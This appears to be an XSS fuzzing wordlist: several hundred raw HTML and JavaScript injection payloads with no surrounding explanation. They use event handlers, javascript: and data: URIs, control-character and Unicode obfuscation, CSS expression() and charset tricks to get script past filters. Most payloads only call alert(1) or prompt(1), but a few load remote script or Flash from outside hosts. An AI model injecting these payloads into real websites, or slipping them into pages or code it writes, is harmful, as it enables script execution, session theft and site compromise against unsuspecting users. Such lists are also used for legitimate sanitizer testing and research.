<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j
	a
		v
			a
		&
Tab;	s
					c
						r

							i
						&
Tab;	p
									t
		&
Tab;							:a
					&Tab
;					l
									&Tab
;		e
												&Tab
;r
														t&Ne
wLine;															28&N
ewLine;															&Ta
b;1
														&Ta
b;		%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r&
Tab;t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/
javascript,ale�
00072;t(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src=&#
34http://sternefami&#
108y.net/foo.js"></sc
ript>​">Click Me</a>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title
onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body
onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset
onScroll>
<script onReadyStateChange script
onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body
onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body
onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound
onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html
onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html
onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe
onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style
onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset
onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html
onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html
onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body
onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html
onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee
onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml
onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet
onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body
onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html
onMouseMove>
<applet onreadystatechange applet
onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html
onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object
onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body
onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe
onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html
onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert('1')>
"><img src=x onerror=javascript:alert("1")>
"><img src=x onerror=javascript:alert(`1`)>
"><img src=x onerror=javascript:alert(('1'))>
"><img src=x onerror=javascript:alert(("1"))>
"><img src=x onerror=javascript:alert((`1`))>
"><img src=x onerror=javascript:alert(A)>
"><img src=x onerror=javascript:alert((A))>
"><img src=x onerror=javascript:alert(('A'))>
"><img src=x onerror=javascript:alert('A')>
"><img src=x onerror=javascript:alert(("A"))>
"><img src=x onerror=javascript:alert("A")>
"><img src=x onerror=javascript:alert((`A`))>
"><img src=x onerror=javascript:alert(`A`)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><
br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br>
<br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test
onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction
actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div
style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden
onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)"
style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-
source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo ;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/
foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHI
AdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/
script&X&>
